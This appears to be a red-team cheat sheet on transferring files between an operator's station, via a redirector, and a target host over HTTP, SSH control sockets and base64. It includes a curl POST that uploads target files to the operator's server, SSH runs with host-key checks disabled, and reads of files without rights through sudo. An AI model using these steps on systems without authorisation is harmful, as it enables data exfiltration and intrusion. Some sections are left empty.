Transferring Files

# **Basic Information** # **Linux** ## **HTTP** ```bash # run on the op station python3 -m http.server <redir_port> python3 -m pip install --user uploadserver python3 -m uploadserver -d <dir> --basic-auth <username>:<password> <redir_port> # run on target wget http://<redir_ip>:<redir_port>/<file.txt> curl http://<redir_ip>:<redir_port>/<file.txt> -o <file> curl -X POST <http://<redir_ip>:<redir_port>/upload> -F 'files=@<file.txt>' -u <username>:<password> ``` ## **SSH** ```bash # ensure ControlMaster is enabled for the ssh client # echo " ControlMaster auto" | sudo tee -a /etc/ssh/ssh_config # sudo systemctl restart ssh # connect to target and setup a master socket ssh -M -S /tmp/socket_name -p <target_port> <user>@<target_ip> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no # have permissions to read the remote file, pull to local host scp -o ControlPath=/tmp/socket_name -s -T dummy:'/remote/file.txt' /local/file.txt # have permissions to read directory, pull to local host scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'/remote/dir' /local/dir # do not have rights to read file, pull to local host ssh -S /tmp/socket_name dummy "sudo cat /remote/file.txt" > /local/file.txt # push a file to the target scp </local/file.txt> <user>@<target_ip>:</remote/file.txt> ``` ## **Base64** ```bash # run on the op station file <file.txt> md5sum <file.txt> base64 <file.txt> -w 0 # run on target, validate transfer was successful via hash echo <base64_encoded_data> | base64 -d > <file.txt> file <file.txt> md5sum <file.txt> ``` # **Windows** ## **SSH** ```bash # to enable master sockets, modify the client config so that ControlMaster is set to auto or yes # connect to target and setup a master socket ssh -M -S /tmp/socket_name -p <target_port> <user>@<target_ip> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no # have permissions to read the remote file, pull to local host scp -o ControlPath=/tmp/socket_name -s -T dummy:'C:\\remote\\file.txt' /local/file.txt scp -o ControlPath=/tmp/socket_name -s -T'@:/C:/remote/*.log' /local/file.txt # have permissions to read directory, pull to local host scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'C:\\remote\\dir' /local/dir # push a file to the target scp </local/file.txt> <user>@<target_ip>:</remote/file.txt> ``` ## **Base64** ```bash # run on the op station # run on target ``` # **References** - [Using the SSH "Konami Code" (SSH Control Sequences)](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences) # **Practical Application** | Platform | Name | Notes | | -------- | ---- | ----- | | | | |